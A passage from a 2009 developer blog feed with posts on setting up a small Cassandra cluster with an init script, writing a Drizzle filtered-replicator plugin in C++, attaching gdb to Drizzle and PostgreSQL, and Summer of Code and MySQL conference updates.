cassandra&gt; exit
$
&lt;/pre&gt;

The cassandra script provided in the bin directory can be used to start cassandra but I wanted a script that I could use to easily start/stop a cassandra instance. Here is an extremely simple script we can use to start and stop cassandra that I created:

&lt;pre&gt;
#!/bin/bash
#
# /etc/init.d/cassandra
#
# Startup script for Cassandra
#

export JAVA_HOME=/usr/lib/jvm/java-6-sun
export CASSANDRA_HOME=/opt/cassandra/source/latest
export CASSANDRA_INCLUDE=/opt/cassandra/conf/cassandra.in.sh
export CASSANDRA_CONF=/opt/cassandra/conf
export CASSANDRA_OWNR=cassandra
export PATH=$PATH:$CASSANDRA_HOME/bin
log_file=/opt/cassandra/logs/stdout
pid_file=/opt/cassandra/logs/pid_file

if [ ! -f $CASSANDRA_HOME/bin/cassandra -o ! -d $CASSANDRA_HOME ]
then
    echo "Cassandra startup: cannot start"
    exit 1
fi

case "$1" in
    start)
        # Cassandra startup
        echo -n "Starting Cassandra: "
        su $CASSANDRA_OWNR -c "$CASSANDRA_HOME/bin/cassandra -p $pid_file" &gt; $log_file 2&gt;&amp;1
        echo "OK"
        ;;
    stop)
        # Cassandra shutdown
        echo -n "Shutdown Cassandra: "
        su $CASSANDRA_OWN -c "kill `cat $pid_file`"
        echo "OK"
        ;;
    reload|restart)
        $0 stop
        $0 start
        ;;
    status)
        ;;
    *)
        echo "Usage: `basename $0` start|stop|restart|reload"
        exit 1
esac

exit 0
&lt;/pre&gt;

The above script can be used to ensure that a cassandra service starts and stops automatically on startup/shutdown of our nodes. This might not be what you want but if it is, you would ensure the script is run at startup/shutdown by copying the script to /etc/init.d and doing the following:

&lt;pre&gt;
$ sudo chmod a+x /etc/init.d/cassandra
$ cd /etc/init.d
$ sudo update-rc.d cassandra defaults 99
update-rc.d: warning: /etc/init.d/cassandra missing LSB information
update-rc.d: see &lt;http://wiki.debian.org/LSBInitScripts&gt;
 Adding system startup for /etc/init.d/cassandra ...
   /etc/rc0.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc1.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc6.d/K99cassandra -&gt; ../init.d/cassandra
   /etc/rc2.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc3.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc4.d/S99cassandra -&gt; ../init.d/cassandra
   /etc/rc5.d/S99cassandra -&gt; ../init.d/cassandra
$
&lt;/pre&gt;

&lt;h2&gt;Adding New Nodes&lt;/h2&gt;

Now that we have 1 node up and running, its time to add more nodes to our cassandra cluster. This is an extremely simple process once the initial node has been set up. Assumming we have performed all the steps listed above on another node (or simply cloned a virtual machine with these steps performed as I am doing), all we need to do is modify the cassandra configuration files on the new nodes. I wish to add 2 new nodes so I will modify the appropriate portion of the storage-conf.xml configuration file to indicate this:

&lt;br&gt;
&lt;script src="http://gist.github.com/288458.js"&gt;&lt;/script&gt;
&lt;br&gt;


Now, lets start the cass02 node in the foreground to see what happens. We would expect to see some indication in the output that knowledge is gained of the other node (in this case cass01) that is available:

&lt;pre&gt;
$ cassandra -f
Listening for transport dt_socket at address: 8888
DEBUG - Loading settings from /opt/cassandra/conf/storage-conf.xml
DEBUG - Syncing log with a period of 1000
DEBUG - opening keyspace Keyspace1
DEBUG - adding Super1 as 0
DEBUG - adding Standard2 as 1
DEBUG - adding Standard1 as 2
DEBUG - adding StandardByUUID1 as 3
DEBUG - adding LocationInfo as 4
DEBUG - adding HintsColumnFamily as 5
DEBUG - opening keyspace system
INFO - Saved Token not found. Using 107959976695419204492109802329269912484
DEBUG - Starting to listen on 192.168.221.139:7001
DEBUG - Binding thrift service to cass02:9160
INFO - Cassandra starting up...
INFO - Node 192.168.221.138:7001 has now joined.
DEBUG - CHANGE IN STATE FOR 192.168.221.138:7001 - has token 65882889577194449649405650603559126735
&lt;/pre&gt;

Ok, now lets start the cassandra service up on cass02 properly using the script I showed earlier. Lets monitor the system log on the initial node we set up (cass01) to see what happens:

&lt;pre&gt; 
INFO [main] 2009-09-07 02:16:14,851 CassandraDaemon.java (line 142) Cassandra starting up...
INFO [GMFD:1] 2009-09-07 02:17:36,433 Gossiper.java (line 630) Node 192.168.221.139:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:17:36,435 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.139:7001 - has token 107959976695419204492109802329269912484
&lt;/pre&gt;

Next, lets start the cassandra service on another node (cass03) and see what happens in the system logs of the initial node (cass01). Note that the storage-conf.xml file on this new node will require the same modifications as mentioned for the cass02 node (the Seeds directive).

&lt;pre&gt; 
INFO [GMFD:1] 2009-09-07 02:18:44,827 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:18:44,828 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
&lt;/pre&gt;

Next, we will shutdown the cass03 node and monitor the system logs where we will observe the following:

&lt;pre&gt; 
INFO [Timer-1] 2009-09-07 02:19:05,960 Gossiper.java (line 234) EndPoint 192.168.221.140:7001 is now dead.
&lt;/pre&gt;

Now, lets start cass03 back up again to see what happens:

&lt;pre&gt; 
INFO [GMFD:1] 2009-09-07 02:20:30,737 Gossiper.java (line 630) Node 192.168.221.140:7001 has now joined.
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 441)
CHANGE IN STATE FOR 192.168.221.140:7001 - has token 27033316431601492526110603272792929694
DEBUG [GMFD:1] 2009-09-07 02:20:30,738 StorageService.java (line 465)
Sending hinted data to 192.168.221.140:7000
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,743
HintedHandOffManager.java (line 200) Started hinted handoff for endPoint 192.168.221.140
DEBUG [HINTED-HANDOFF-POOL:1] 2009-09-07 02:20:30,760
HintedHandOffManager.java (line 235) Finished hinted handoff for endpoint 192.168.221.140
&lt;/pre&gt;

Now all 3 nodes are back in the cluster again. We can see how easy it is to add new nodes. We simply need to inform the new node of some other nodes in the cluster (not necessarily all of them due to the gossip-based membership protocol).

&lt;h2&gt;Conclusion&lt;/h2&gt;
The main reason I wrote this post is because I wanted to document my experiences in setting up a small cassandra cluster for future reference. I'm taking a &lt;a href="http://lagoon.cs.umd.edu/classes/818fall09/"&gt;class&lt;/a&gt; this semester in distributed systems for fun (since I've satisfied the course requirements for my program) which involves a semester project and one project that I've been toying with in my mind is performing an experimental evaluation of various failure detectors. For example, cassandra uses the phi-accrual failure detector from H&lt;span&gt;&lt;span class="a"&gt;ayashibara&lt;/span&gt;&lt;/span&gt;et al's &lt;a href="http://ddg.jaist.ac.jp/pub/HDY+04.pdf"&gt;paper&lt;/a&gt; but there is a multitude of other possible failure detectors that could be used. I'm thinking of implementing and evaluating various failure detectors in real systems such as cassandra and &lt;a href="http://project-voldemort.com/"&gt;voldemort&lt;/a&gt;. It is one possibility for a project that I've thought of (which I have not ran by the professor yet). I've implemented a different failure detector in cassandra already this week but performing an evaluation of a failure detector is not an easy process (what metrics to use to evaluate a failure detector is itself an interesting question). However, if anyone could think of any other interesting project in distributed systems that might allow me to make a contribution to one of these open-source projects, that would be awesome! Anyway, that's all I've got for now. A really good article to read next is &lt;a href="http://blog.evanweaver.com/articles/2009/07/06/up-and-running-with-cassandra/"&gt;this one&lt;/a&gt; that goes into some detail on actually using cassandra.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/09/07/building-a-small-cassandra-cluster-for-testing-and-development.html</feedburner:origLink></entry>
 
 <entry>
   <title>Developing a Replicator Plugin for Drizzle</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/HFN9fx2OfxE/developing-a-replicator-plugin-for-drizzle.html" />
   <updated>2009-07-24T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/07/24/developing-a-replicator-plugin-for-drizzle</id>
   <content type="html">Recently, I started working on a plugin that performs direct to Memcached replication in Drizzle. While working on this, I found that I wanted to be able to filter replication events based on schema or table names. I went ahead and implemented this in my Memcached plugin but then realized that this functionality would be better off as its own plugin as I imagine filtering of replication events will be a pretty common task people will want to perform. This led me to start working on a filtered replicator plugin for Drizzle. Before diving in to the plugin implementation, I should mention that &lt;a href="http://www.jpipes.com/"&gt;Jay Pipes&lt;/a&gt; has previously &lt;a href="http://www.jpipes.com/index.php?/archives/290-Towards-a-New-Modular-Replication-Architecture.html"&gt;written in significant detail&lt;/a&gt; on the replication architecture in Drizzle. I recommend reading that post from Jay if you are not familiar with replication in Drizzle before proceeding with this post.&lt;br&gt;

Jay is currently working on providing documentation regarding replication in Drizzle and you can track that work on the &lt;a href="http://drizzle.org/wiki/Replication"&gt;wiki page&lt;/a&gt; he created. Its still a work in progress so if you really want to discover how all this works in Drizzle, I recommend having a look at the source code. Jay's work contains a copious amount of comments and is not difficult to read or understand; I highly recommend it. If you are interested in getting involved with this replication development, I'm sure Jay would be more than happy to get some contributors involved. The best way to get started is to ping the mailing list or one of the developers on #drizzle on FreeNode to indicate your interest.&lt;br&gt;

&lt;strong&gt;Development of the Replicator Plugin&lt;/strong&gt;

As with any plugin in Drizzle, there are 3 files that are important for building the plugin:
&lt;ul&gt;
	&lt;li&gt;plugin.ini&lt;/li&gt;
	&lt;li&gt;plugin.ac&lt;/li&gt;
	&lt;li&gt;plugin.am&lt;/li&gt;
&lt;/ul&gt;
Only the plugin.ini file is mandatory. This file is a standard ini-file that currently contains only one section - [plugin]. For the filtered replicator plugin, the plugin.ini file looked like:&lt;br&gt;

&lt;pre&gt;
[plugin]
name=filtered_replicator
title=Filtered Replicator
description=A simple filtered replicator which allows a user to filter out
            events based on a schema or table name
load_by_default=yes
sources=filtered_replicator.cc
headers=filtered_replicator.h
&lt;/pre&gt;

More information on the 3 files related to plugins are available on the &lt;a href="http://drizzle.org/wiki/Plugin_Build_System"&gt;plugin build system page&lt;/a&gt; on the &lt;a href="http://drizzle.org/wiki"&gt;Drizzle wiki&lt;/a&gt;. Since the replicator plugin does not depend on any external library, we don't need to worry about the other 2 plugin build files here.&lt;br&gt;

Now, since we are developing a replicator, we need to be aware of the replicator API provided by Drizzle's core kernel. That API is defined in the drizzled/plugin/replicator.h include file. If we look in that file, we find the following class definition:

&lt;pre&gt;
/**
 * Class which replicates Command messages
 */
class Replicator
{
public:
  Replicator() {}
  virtual ~Replicator() {}
  /**
   * Replicate a Command message to an Applier.
   *
   * @note
   *
   * It is important to note that memory allocation for the
   * supplied pointer is not guaranteed after the completion
   * of this function -- meaning the caller can dispose of the
   * supplied message.  Therefore, replicators and appliers
   * implementing an asynchronous replication system must copy
   * the supplied message to their own controlled memory storage
   * area.
   *
   * @param Command message to be replicated
   */
  virtual void replicate(Applier *in_applier,
                         drizzled::message::Command *to_replicate)= 0;

  /**
   * A replicator plugin should override this with its
   * internal method for determining if it is active or not.
   */
  virtual bool isActive() {return false;}
};
&lt;/pre&gt;

The above was developed by Jay and thanks to his awesome work (with really helpful comments), its pretty easy for us to determine what our replicator plugin needs to do. Basically, all we need to do is inherit from the Replicator class and implement the replicate() and isActive() methods and we have a simple replicator! Thus, we will have the following class:

&lt;pre&gt;
class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();
};
&lt;/pre&gt;

Now, for the moment we want to filter by schema name or table name. Thus, we need a place to store the list of schema and table names to filter. Since this is Drizzle and Drizzle is all about using the STL, we'll go with a std::vector for each of these lists. We are going to assume that the list of schemas and table names to filter by are specified as a comma-separated list so we will need a method to parse a comma-separated list and populate the appropriate vectors. Finally, we will also need methods for determining whether a table name or schema name should be filtered or not. Based on all this, our class definition will now look like:

&lt;pre&gt;
class FilteredReplicator: public drizzled::plugin::Replicator
{
public:
  FilteredReplicator() {}

  /** Destructor */
  ~FilteredReplicator() {}

  void replicate(drizzled::plugin::Applier *in_applier,
                 drizzled::message::Command *to_replicate);

  /**
   * Returns whether the replicator is active.
   */
  bool isActive();

  /**
   * Populate the vector of schemas to filter from the
   * comma-separated list of schemas given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setSchemaFilter(const std::string &amp;input);

  /**
   * Populate the vector of tables to filter from the
   * comma-separated list of tables given. This method
   * clears the vector first.
   *
   * @param[in] input comma-separated filter to use
   */
  void setTableFilter(const std::string &amp;input);

private:

  /**
   * Given a comma-separated string, parse that string to obtain
   * each entry and add each entry to the supplied vector.
   *
   * @param[in] input a comma-separated string of entries
   * @param[out] filter a std::vector to be populated with the entries
   *                    from the input string
   */
  void populateFilter(const char *input,
                      std::vector &amp;filter);

  /**
   * Search the vector of schemas to filter to determine whether
   * the given schema should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] schema_name name of schema to search for
   * @return true if the given schema should be filtered; false otherwise
   */
  bool isSchemaFiltered(const std::string &amp;schema_name);

  /**
   * Search the vector of tables to filter to determine whether
   * the given table should be filtered or not. The parameter
   * is obtained from the Command message passed to the replicator.
   *
   * @param[in] table_name name of table to search for
   * @return true if the given table should be filtered; false otherwise
   */
  bool isTableFiltered(const std::string &amp;table_name);

  std::vector schemas_to_filter;
  std::vector tables_to_filter;
};
&lt;/pre&gt;

Now that we have the API for our replicator plugin decided on, lets implement the replicate() function. This will perform the filtering of events. For this plugin, it looks pretty simple (which is a good thing!):

&lt;pre&gt;
void FilteredReplicator::replicate(drizzled::plugin::Applier *in_applier,
                                   drizzled::message::Command *to_replicate)
{
  /*
   * We first check if this event should be filtered or not...
   */
  if (isSchemaFiltered(to_replicate-&gt;schema()) ||
      isTableFiltered(to_replicate-&gt;table()))
  {
    return;
  }

  /*
   * We can now simply call the applier's apply() method, passing
   * along the supplied command.
   */
  in_applier-&gt;apply(to_replicate);
}
&lt;/pre&gt;

Our method for checking whether a schema should be filtered or not simply uses the STL. For completeness, that method looks as follows:

&lt;pre&gt;
bool FilteredReplicator::isSchemaFiltered(const string &amp;schema_name)
{
  vector::iterator it= find(schemas_to_filter.begin(),
                            schemas_to_filter.end(),
                            schema_name);
  if (it != schemas_to_filter.end())
  {
    return true;
  }
  return false;
}
&lt;/pre&gt;

There is not much more to it than that! As you can see, developing a replicator plugin does not have to be very difficult. Thanks to Jay's awesome work, it is actually fun! I am really enjoying working on my memcached applier at the moment (so much so that I probably spend too much time thinking about it when I should be working on other things...)&lt;br&gt;

&lt;strong&gt;System Variables in a Plugin&lt;/strong&gt;

The handling of system variables in a Drizzle plugin is not very pretty at the moment. Thankfully, &lt;a href="http://mysql-ha.com/"&gt;Monty&lt;/a&gt; is working on refactoring system variables in Drizzle. You can read more about that work on the &lt;a href="http://drizzle.org/wiki/Refactor_system_variables"&gt;wiki page&lt;/a&gt; Monty created. However, for now, we are stuck with the old system. I'm going to describe what I needed to do for one system variable that specifies which schemas we should filter when filtering replication events. The system variable declaration looks as follows:

&lt;pre&gt;
static DRIZZLE_SYSVAR_STR(filteredschemas,
                          sysvar_filtered_replicator_sch_filters,
                          PLUGIN_VAR_OPCMDARG,
                          N_("List of schemas to filter"),
                          check_filtered_schemas, /* check func */
                          set_filtered_schemas, /* update func */
                          NULL /* default */);
&lt;/pre&gt;

You can see that we specified 2 callback functions: check_filtered_schemas() and set_filtered_schemas(). These are both called when a SET command is executed on this system variable. The check_filtered_schemas() function can be used to make sure that the input is well-formed (I don't really check for that at the moment). For the moment, the check_filtered_schemas() function just copies the input string to a temporary string. Here is the code for that function (the temporary string and mutex are declared as global variables):

&lt;pre&gt;
static int check_filtered_schemas(Session *,
                                  struct st_mysql_sys_var *,
                                  void *,
                                  struct st_mysql_value *value)
{
  char buff[STRING_BUFFER_USUAL_SIZE];
  int len= sizeof(buff);
  const char *input= value-&gt;val_str(value, buff, &amp;len);

  if (input &amp;&amp; filtered_replicator)
  {
    pthread_mutex_init(&amp;sysvar_sch_lock, NULL);
    pthread_mutex_lock(&amp;sysvar_sch_lock);
    tmp_sch_filter_string= new(std::nothrow) string(input);
    if (tmp_sch_filter_string == NULL)
    {
      pthread_mutex_unlock(&amp;sysvar_sch_lock);
      pthread_mutex_destroy(&amp;sysvar_sch_lock);
      return 1;
    }
    return 0;
  }
  return 1;
}
&lt;/pre&gt;

Next, we need a function to actually update the system variable. This function looks like so:

&lt;pre&gt;
static void set_filtered_schemas(Session *,
                                 struct st_mysql_sys_var *,
                                 void *var_ptr,
                                 const void *save)
{
  if (filtered_replicator)
  {
    if (*(bool *)save != true)
    {
      filtered_replicator-&gt;setSchemaFilter(*tmp_sch_filter_string);
      /* update the value of the system variable */
      *(const char **) var_ptr= tmp_sch_filter_string-&gt;c_str();
      /* we don't need this temporary string anymore */
      delete tmp_sch_filter_string;
      pthread_mutex_unlock(&amp;sysvar_sch_lock);
      pthread_mutex_destroy(&amp;sysvar_sch_lock);
    }
  }
}
&lt;/pre&gt;

You can see that having system variables in a plugin that can be updated is a little bit tricky right now in Drizzle. I wouldn't spend too much time worrying about this at the moment though. Like I said, once Monty finishes his system variable refactoring, we won't have to write such ugly and hard to understand code again. I am definitely looking forward to using the refactored system variables in Drizzle!&lt;br&gt;

&lt;strong&gt;Using the Plugin&lt;/strong&gt;

My branch with the filtered replicator plugin I developed is available on Launchpad. You can build it by pulling the branch from Launchpad:

&lt;pre&gt;
$ cd dir/to/place/branch
$ bzr branch lp:~posulliv/drizzle/filtered-replicator
$ cd filtered-replicator
$ ./config/autorun.sh &amp;&amp; ./configure &amp;&amp; make
&lt;/pre&gt;

After compiling the branch, we can start playing with it. First thing we need to do is to start Drizzle. That can be accomplished easily:

&lt;pre&gt;
$ cd /dir/with/replicator/branch
$ mkdir run
$ cd run
$ ../drizzled/drizzled --no-defaults --port=9306 \
--basedir=$PWD --datadir=$PWD \
--filtered-replicator-enable --filtered-replicator-filteredschemas='one,two' \
&gt;&gt; $PWD/drizzle.err 2&gt;&amp;1 &amp;
&lt;/pre&gt;

The above command will start drizzled along with the filtered replicator. One of the system variables associated with this replicator is which schemas to filter replication events by. It is possible to specify these when starting the server (as well as tables to filter replication events by). You will notice that we have not enabled any applier of replication events. What does this mean? Well, it means that nothing is being done with the events that are happening! Sure, I have a replicator running that filters events based on what I specify but nothing is done with these events! I'm currently working on a Memcached applier that takes events and pushes them to a Memcached server to maintain a proactive cache but that is the topic of another blog post.&lt;br&gt;

Now that we have the server up and running, lets see what system variables there are related to our replicator plugin (below, we are assuming the server is still running):

&lt;pre&gt;
$ cd /dir/with/replicator/branch
$ cd run
$ ../client/drizzle --port=9306
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 2
Server version: 2009.07.1067 Source distribution (filtered-replicator)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | first,second |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

Lets modify the schemas we are filtering replication by (after showing the actual code that performs this, we might as well do it!):

&lt;pre&gt;
drizzle&gt; set global filtered_replicator_filteredschemas = 'third,fourth';
Query OK, 0 rows affected (0 sec)

drizzle&amp;gt; show variables like '%replicat%';
+-------------------------------------+--------------+
| Variable_name                       | Value        |
+-------------------------------------+--------------+
| default_replicator_enable           | OFF          |
| filtered_replicator_enable          | ON           |
| filtered_replicator_filteredschemas | third,fourth |
| filtered_replicator_filteredtables  |              |
| innodb_replication_delay            | 0            |
+-------------------------------------+--------------+
5 rows in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;strong&gt;Conclusion&lt;/strong&gt;

This plugin is still under development and I'd love any input from people. What I'd really like to know is what kind of filters would people like to be able to specify? How flexible would people want a filtered replicator to be? Right now, its only possible to filter by schema or table name but I could easily add more options if I thought they would be useful to people.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/07/24/developing-a-replicator-plugin-for-drizzle.html</feedburner:origLink></entry>
 
 <entry>
   <title>Summer of Code Progress</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/tjnYsRmwCCo/summer-of-code-progress.html" />
   <updated>2009-07-14T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/07/14/summer-of-code-progress</id>
   <content type="html">Since we are around the half-way point in Google's Summer of Code, I thought I'd post a quick update on how things are going so far.&lt;br&gt;

Right now, INFORMATION_SCHEMA is nearly a full plugin in Drizzle. The final patch which finishes the extraction of I_S into a plugin has been proposed for merging and I'm still waiting for that to get pushed to trunk. Once that happens, I will be able to get started on modifying the implementation of the various I_S tables. All in all, its going pretty well. Its extremely satisfying to have patches accepted and placed straight into the codebase of the project that you are working on. I believe this is due to the fact that I am extremely lucky to be working on a project such as Drizzle with an awesome community. Unfortunately, I know that some SoC projects never get utilized which seems to me like a bit of a waste to me.&lt;br&gt;

To keep myself busy while waiting for patches to get merged, I decided to port the memcached UDF's to Drizzle. This has pretty much been completed save for a few UDF's that still need to be ported over. I added a test suite for the plugin tonight and am hoping to get it merged in the next week or two. A project that I'm just getting started with is creating a replication plugin for Drizzle that would send events to a memcached server. I'm hoping to get a simple prototype working in the next week or so and will then look for feedback from the community on it.&lt;br&gt;

I've been pretty busy this summer and so have not had much time for posting. I would like to say that will improve in the future but its unlikely!
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/07/14/summer-of-code-progress.html</feedburner:origLink></entry>
 
 <entry>
   <title>Debugging Drizzle with GDB</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/LWmRR5iGO0A/debugging-drizzle-with-gdb.html" />
   <updated>2009-05-21T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/05/21/debugging-drizzle-with-gdb</id>
   <content type="html">While working with Drizzle this week for my &lt;a href="http://drizzle.org/wiki/GSOC_Information_Schema"&gt;GSoC project,&lt;/a&gt; I've been going through the source code to understand how INFORMATION_SCHEMA is currently implemented. Reading through the source code is obviously the best way to understand the logic behind the current I_S implementation but using a debugger to step through the execution of this code can be extremely helpful in speeding up this process. &lt;a href="http://torum.net/"&gt;Toru&lt;/a&gt; previously published a &lt;a href="http://torum.net/2009/03/drizzle-gdb-osx/"&gt;related post&lt;/a&gt; on debugging Drizzle with gdb which may also be useful.&lt;br&gt;

As Toru mentioned in his post, attaching gdb to Drizzle can be quite simple:&lt;br&gt;

&lt;script src="http://gist.github.com/115664.js"&gt;&lt;/script&gt;
&lt;br&gt;

The above commands will open a xterm window with a gdb session started that is attached to the Drizzle server process. While this works fine, sometimes I am working on a remote machine and don't want to go to the hassle of setting up something like X11 forwarding or VNC to attach gdb to the server process. Also, while going through the I_S related code, I wanted to step through the code which occurs on server startup i.e. the things which happen before the xterm window with gdb opens as outlined above.&lt;br&gt;

Thus, I wrote the following simple script that I use to debug Drizzle with gdb.&lt;br&gt;

&lt;script src="http://gist.github.com/115654.js"&gt;&lt;/script&gt;
&lt;br&gt;

This script takes as an argument the path to the root of a Drizzle build directory. It then simply checks to see if Drizzle is running already or not. If it is already running, it will attach gdb to the Drizzle process in the current terminal window, for example:&lt;br&gt;

&lt;script src="http://gist.github.com/115668.js"&gt;&lt;/script&gt;
&lt;br&gt;

If Drizzle is not already running, the script starts gdb so we can then kick Drizzle off ourselves within gdb and debug the server startup, for example:&lt;br&gt;

&lt;script src="http://gist.github.com/115671.js"&gt;&lt;/script&gt;
&lt;br&gt;

That's about all I have for this post. As you can see, attaching gdb to Drizzle is a pretty straightforward process. I like to use my script mainly on remote servers but I also find it useful when I want to debug server startup on my local box too.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/05/21/debugging-drizzle-with-gdb.html</feedburner:origLink></entry>
 
 <entry>
   <title>Attaching gdb To PostgreSQL</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Mk25Vi1VcQ8/attaching-gdb-to-postgresql.html" />
   <updated>2009-05-03T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/05/03/attaching-gdb-to-postgresql</id>
   <content type="html">This semester I've been doing a project with PostgreSQL and I needed to attach a debugger to PostgreSQL on numerous occasions to see what was going on. Since I didn't find much documentation on how to accomplish this, I thought I'd document it here for myself so I can refer to it in the future.&lt;br&gt;

First off, since we want to attach a debugger to a program, we should make sure that program is compiled with debugging information. WIth Postgres, we can easily do that by passing it as an option to the configure script in the top level of the Postgres source code. Thus, I run configure as follows:&lt;br&gt;

&lt;script src="http://gist.github.com/105847.js"&gt;&lt;/script&gt;
&lt;br&gt;

Now we can just build the source and install as per usual. Enabling asserts was a good idea for me in my situation as it turns on many sanity checks which were useful for my purposes. Next, we start up the Postgres server and create a database if necessary. Once that is done, clients can connect to the database. So I go ahead and start a session using the psql command line utility and connect to my newly created database.&lt;br&gt;

Once a client was connected, I was able to run the following script in another terminal to find and attach to the Postgres process that was serving my session (this script is very much based on something that Tom Lane &lt;a href="http://archives.postgresql.org/pgsql-general/2007-07/msg00908.php"&gt;posted&lt;/a&gt; to the pg-hackers mailing list some time ago):&lt;br&gt;

&lt;script src="http://gist.github.com/105856.js"&gt;&lt;/script&gt;
&lt;br&gt;

If no session is currently connected to Postgres, this script does nothing and silently exits. However, if a session is open, then gdb will attach to the Postgres server process serving that session. Here is an example output from when I ran it:&lt;br&gt;

&lt;script src="http://gist.github.com/105858.js"&gt;&lt;/script&gt;
&lt;br&gt;

I ran a query in another terminal which triggered the breakpoint that I set in my debugger. The script I have provided does not work very elegantly if there are multiple clients connected to Postgres. It just lists out the process ID's of the various clients. For example, if 2 clients are connected to Postgres, we would get:&lt;br&gt;

&lt;script src="http://gist.github.com/105859.js"&gt;&lt;/script&gt;
&lt;br&gt;

We could then manually use gdb to attach to the process that we are interested in. We can find out which process it is that we want to connect to from within our client's session as so:&lt;br&gt;

&lt;script src="http://gist.github.com/105863.js"&gt;&lt;/script&gt;
&lt;br&gt;

Now we see that this session corresponds to process 16588. We can simply attach gdb to this process as is done in the above shell script.&lt;br&gt;

During the semester, this script worked fine for me as I never had to worry about multiple clients being connected at the same time. I was only ever dealing with 1 client connected to the server at a time so the above script served my purposes perfectly.&lt;br&gt;

Note that the above process won't work if you want to debug part of the backend startup sequence. If you are interested in doing this, a very brief explanation is given on the PostgreSQL developers &lt;a href="http://wiki.postgresql.org/wiki/Developer_FAQ#What_debugging_features_are_available.3F"&gt;FAQ&lt;/a&gt;. I have not tried this and don't know how realiable or easy this is to do.
</content>
 <feedburner:origLink>http://posulliv.github.com//2009/05/03/attaching-gdb-to-postgresql.html</feedburner:origLink></entry>
 
 <entry>
   <title>Google Summer of Code</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/Q-SdufiDpEQ/google-summer-of-code.html" />
   <updated>2009-04-21T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/04/21/google-summer-of-code</id>
   <content type="html">Yesterday, I found out that my proposal for Google's Summer of Code was &lt;a href="http://socghop.appspot.com/org/home/google/gsoc2009/ccharles"&gt;accepted&lt;/a&gt;. This means I'll be getting paid to work full-time on Drizzle during the summer! I'll write a longer post on my actual project soon and I'll be updating this blog much more regularly during the summer with updates on my project.&lt;br&gt;

This week I'm at the &lt;a href="http://www.mysqlconf.com/mysql2009"&gt;MySQL user's conference&lt;/a&gt; in Santa Clara where there are lots of interesting talks.

</content>
 <feedburner:origLink>http://posulliv.github.com//2009/04/21/google-summer-of-code.html</feedburner:origLink></entry>
 
 <entry>
   <title>MySQL User Conference</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/SLZsZslTIFs/mysql-user-conference.html" />
   <updated>2009-04-14T00:00:00-07:00</updated>
   <id>http://schacon.github.com//2009/04/14/mysql-user-conference</id>
   <content type="html">This year, I'm lucky enough to be going to the &lt;a href="http://www.mysqlconf.com/mysql2009"&gt;MySQL User Conference&lt;/a&gt; in Santa Clara. I've decided on the tutorials I'll be attending:

&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://www.mysqlconf.com/mysql2009/public/schedule/detail/7066"&gt;The Revised Memcached Tutorial&lt;/a&gt;&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://www.mysqlconf.com/mysql2009/public/schedule/detail/6805"&gt;Scale Up, Scale Out, and High Availability&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

I know a bit about Memcached (such as when it might be useful) but have never used it in practice as I've never had the opportunity so I'm looking forward to learning a bit more about Memcached. The second tutorial should also be pretty interesting and I'm looking forward to hearing some interesting scaling techniques which I might not have known about before. &lt;br&gt;

As for the sessions during the remainder of the week, I know I'll be attending all the ones being put on by various Drizzle developers, such as Brian's session on &lt;a href="http://www.mysqlconf.com/mysql2009/public/schedule/detail/5781"&gt;Drizzle&lt;/a&gt;, Stewart's session on &lt;a href="http://www.mysqlconf.com/mysql2009/public/schedule/detail/6940"&gt;memory management&lt;/a&gt; in MySQL/Drizzle, Eric's session on &lt;a href="http://www.mysqlconf.com/mysql2009/public/schedule/detail/6658"&gt;libdrizzle&lt;/a&gt;, and Monty's session on &lt;a href="http://www.mysqlconf.com/mysql2009/public/schedule/detail/6830"&gt;SQL&lt;/a&gt; called 'SQL is dead' (I'm pretty interested to hear what Monty has to say for that session!). I'm also planning on attending a few Ruby/Rails related sessions; I'm very interested in a session on ActiveRecord. There are a few sessions going on at the same time that I'm in two minds about at the moment. I'm thinking that I'll just make my mind up on the day about which one I will attend.&lt;br&gt;

